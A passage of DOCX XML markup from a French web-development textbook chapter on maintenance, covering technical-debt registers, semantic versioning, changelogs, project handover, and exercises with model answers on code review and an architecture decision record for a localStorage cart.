            <w:tcW w:type="dxa" w:w="2862"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Automatiser</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un tableau visible plutôt qu'une mémoire collective · markdown</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Un registre de dette, dans le dépôt</w:t>
        <w:br/>
        <w:t>| Zone | Dette | Impact | Coût estimé |</w:t>
        <w:br/>
        <w:t>|------|-------|--------|-------------|</w:t>
        <w:br/>
        <w:t>| `menu.js` | Deux implémentations du menu | Corrections doubles | 2 h |</w:t>
        <w:br/>
        <w:t>| `styles/` | Trois valeurs d'espacement hors échelle | Incohérence visuelle |</w:t>
        <w:br/>
        <w:t xml:space="preserve">  1 h |</w:t>
        <w:br/>
        <w:t>| `api.js` | Aucun test | Régression silencieuse | 4 h |</w:t>
      </w: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LA RÈGLE DU BOY-SCOUT</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Laissez le fichier un peu plus propre que vous ne l'avez trouvé : un nom clarifié, un test ajouté, une fonction extraite. Ces petites améliorations coûtent peu et empêchent la dégradation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>40.4 Branches, versions et livraisons</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une organisation simple suffit à la plupart des projets : une branche principale stable, des branches courtes par contribution, et des étiquettes de version.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une organisation lisible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main                 toujours livrable</w:t>
        <w:br/>
        <w:t>├── feat/menu-clavier</w:t>
        <w:br/>
        <w:t>├── fix/contraste-bouton</w:t>
        <w:br/>
        <w:t>└── chore/maj-dependances</w:t>
        <w:br/>
        <w:br/>
        <w:t># Versionnement sémantique</w:t>
        <w:br/>
        <w:t>v1.4.2</w:t>
        <w:br/>
        <w:t xml:space="preserve"> │ │ └── correctif</w:t>
        <w:br/>
        <w:t xml:space="preserve"> │ └──── ajout compatible</w:t>
        <w:br/>
        <w:t xml:space="preserve"> └────── rupture de compatibilité</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.132 — Trois types de changement</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14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Type de changement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Version</w:t>
            </w:r>
          </w:p>
        </w:tc>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Exemple</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3148"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Correctif compatible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2862"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1.4.2 → 1.4.3</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Bug d'affichage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="314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Ajout compatible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="286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1.4.3 → 1.5.0</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Nouvelle page</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3148"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Rupture</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2862"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1.5.0 → 2.0.0</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Suppression d'une API</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un journal lisible par les utilisateurs · markdown</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Journal des versions</w:t>
        <w:br/>
        <w:t>## [1.5.0] — 2026-04-02</w:t>
        <w:br/>
        <w:t>### Ajouté</w:t>
        <w:br/>
        <w:t>- Filtre des programmes avec compteur annoncé.</w:t>
        <w:br/>
        <w:t>### Corrigé</w:t>
        <w:br/>
        <w:t>- Contraste du bouton secondaire en thème sombre (AA).</w:t>
        <w:br/>
        <w:t>### Modifié</w:t>
        <w:br/>
        <w:t>- Le menu se ferme avec Échap et rend le focus au bouton.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le journal des versions s'écrit pour ceux qui utilisent le logiciel, pas pour les développeurs. « Correction de divers problèmes » n'informe personne.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>40.5 Transmettre</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un projet se transmet dans une situation de crise : un départ, une urgence, un changement d'équipe. La documentation doit permettre à quelqu'un qui n'a jamais vu le code de le lancer en moins d'une heure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une liste qui révèle les angles morts · markdown</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Vérification de reprise</w:t>
        <w:br/>
        <w:br/>
        <w:t>- [ ] Un nouveau venu clone le dépôt et lance le site en moins de 30 min.</w:t>
        <w:br/>
        <w:t>- [ ] Les variables d'environnement nécessaires sont listées.</w:t>
        <w:br/>
        <w:t>- [ ] La procédure de déploiement est écrite et testée.</w:t>
        <w:br/>
        <w:t>- [ ] Les accès (hébergement, domaine, analytics) sont inventoriés.</w:t>
        <w:br/>
        <w:t>- [ ] Les décisions structurantes sont documentées.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:tblBorders>
          <w:left w:val="single" w:sz="24" w:space="0" w:color="2F7D5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AF3EE"/>
            <w:tcMar>
              <w:top w:w="140" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:bottom w:w="140" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:before="0" w:after="80" w:line="250" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="2F7D5B"/>
                <w:sz w:val="18"/>
                <w:spacing w:val="12"/>
              </w:rPr>
              <w:t>CE QUI RESTE QUAND ON PART</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Ni vous ni votre mémoire ne serez disponibles. Ce qui reste, c'est le dépôt, la documentation, les tests et l'historique. Investissez dans ce qui reste.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="2603500"/>
            <wp:docPr id="50" name="Picture 50"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f48.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId74"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="2603500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.48 — Quatre piliers de la maintenance</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UNE HEURE PAR MOIS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Mettre à jour les dépendances et relancer les tests.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Relire le registre de dette et en traiter une ligne.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Vérifier que la documentation correspond encore au code.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Tester la procédure de déploiement depuis un environnement propre.</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revue vérifie correction, lisibilité, cohérence, sécurité et testabilité.</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Distinguez bloquant, question et suggestion.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formateur automatique règle le style ; la revue traite le reste.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documentation explique le pourquoi, pas le comment.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décision d'architecture note les options écartées.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dette technique se registre et se traite par petites touches.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projet se transmet par le dépôt, les tests et la documentation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le cours 1 s'achève ici : du premier fichier HTML à un site maintenu. Le cours 2 prend le relais sur l'infrastructure, la livraison continue et l'exploitation.</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40.1 — Conduire une revue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Une demande de fusion ajoute un filtre de recherche en JavaScript.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Relevez un point bloquant.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Posez une question ouverte.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Formulez une suggestion non bloquante.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 40.2 — Rédiger une décision d'architecture</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   DOCUMENTATION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>L'équipe hésite entre stockage local et cookies pour un panier.</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Exposez le contexte.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Tranchez et justifiez.</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Listez les conséquences.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 40.3 — Préparer une reprise de projet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   TRANSMISSION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Vous quittez le projet dans deux semaines.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Listez ce qui n'est pas dans le code.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Rédigez la procédure de déploiement.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Faites relire par un tiers.</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40.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Bloquant</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — La recherche est réinitialisée à chaque rendu :</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>liste.innerHTML = ""</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> efface aussi les nœuds du message « aucun résultat ».</w:t>
        <w:br/>
        <w:t xml:space="preserve">Utilisez </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>replaceChildren</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> avec les nœuds construits.</w:t>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Question</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Que se passe-t-il si l'utilisateur tape très vite ? Une</w:t>
        <w:br/>
        <w:t xml:space="preserve">requête lente peut écraser une réponse plus récente. Un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>AbortController</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>est-il prévu ?</w:t>
        <w:br/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Suggestion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>filtrer()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> mélange filtrage et rendu. Extraire la</w:t>
        <w:br/>
        <w:t>fonction de filtrage la rendrait testable sans DOM.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Trois niveaux distincts permettent à l'auteur de prioriser sans deviner.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La question ouverte laisse l'auteur expliquer un choix peut-être délibéré.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 40.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"># 007 — Panier dans </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>localStorage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:br/>
        <w:t>## Contexte</w:t>
        <w:br/>
        <w:t>Panier non authentifié, moins de 50 articles, besoin de survie entre</w:t>
        <w:br/>
        <w:t>deux visites, aucun traitement serveur avant la commande.</w:t>
        <w:br/>
        <w:br/>
        <w:t>## Décision</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>localStorage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, clé </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>panier.v1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, structure </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>{ version, lignes[] }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
        <w:br/>
        <w:br/>
        <w:t>## Options écartées</w:t>
        <w:br/>
        <w:t>- Cookie : 4 Ko insuffisants pour un panier moyen.</w:t>
        <w:br/>
        <w:t>- IndexedDB : complexité inutile pour ce volume.</w:t>
        <w:br/>
        <w:t>- Session serveur : impose une authentification dès le premier article.</w:t>
        <w:br/>
        <w:br/>
        <w:t>## Conséquences</w:t>
        <w:br/>
        <w:t>- Données visibles et modifiables par l'utilisateur : validation à la commande.</w:t>
        <w:br/>
        <w:t>- Taille limitée : surveiller le quota et proposer un message clair.</w:t>
        <w:br/>
        <w:t xml:space="preserve">- Migration prévue par le champ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>version</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les options écartées évitent qu'un nouveau venu propose la même idée dans six mois.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les conséquences assument le coût du choix, y compris ses risques.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 40.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
